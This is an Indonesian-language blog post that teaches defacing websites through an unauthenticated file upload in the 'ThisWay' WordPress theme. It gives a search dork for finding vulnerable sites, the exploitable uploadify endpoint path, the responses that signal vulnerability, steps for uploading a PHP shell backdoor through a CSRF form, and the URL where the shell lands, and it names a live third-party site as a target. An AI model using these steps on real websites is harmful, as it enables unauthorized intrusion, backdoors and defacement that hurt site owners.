Assalamu'alaikum
Oke Gan Selamat Datang Kembali di Blog Saya hehehe Udh lama Nih Mimin Gak UPDATE tentang Tutorial Khusus nya Dalam DEFACE .. ^_^ Lanjut saja Simak Tutorial di bawah ya
Bahan :
1.DORK
2.Exploit
3.CSRF
Eksekusi Selanjutnya
1.Pertama masukan dork ini di kolom mesin pencarian google/search engine
- inurl:/wp-content/themes/ThisWay/ site:com <= Bisa di kembangin Lagi Biar dapet yg FRESS Gan
2.Lalu masukan exploit ini : "/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php"
- example :
http://target.com/[patch]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php
3.Apabila keluar tulisan seperti ini {"status":"NOK","ERR":"This file is incorect"} atau Blank kemungkinan besar website tersebut Vuln. namun apabila keluar Error 404 dan sebagainya berarti tidak vuln Gan :v
4.Lalu pastekan script berikut di notepad, lalu save dengan ekstensi .html
Script CSRF >> Click Here <<
5.Nanti keluar result/tulisan seperti ini : {"status":"OK","imageID":12,"imageName":"settingimage_namarandomnameshell.php"}
Bila tidak nongol tulisan kaya gitu, cari target lain :)
6.Akses shell backdoor kalian di
- http://www.target.com/wp-content/uploads/[tahun]/[bulan]/settingsimage_randomnameshell.php
Example :
- http://target.com/wp-content/uploads/2016/09/settingsimage_c99326667788.php
Nih mimin Kasih Live Target Gan .. Jangan di rusak Yak Live Target Nya :D
Live Target : http://www.beautyandhair.com.mx
Sekian Tutorial kali ini Gan Semoga bermanfaat ^_^... Bagi Yg Mau CopAS Mohon Di Kasih SUmber nya Gan Trimakasih ;)
0 Komentar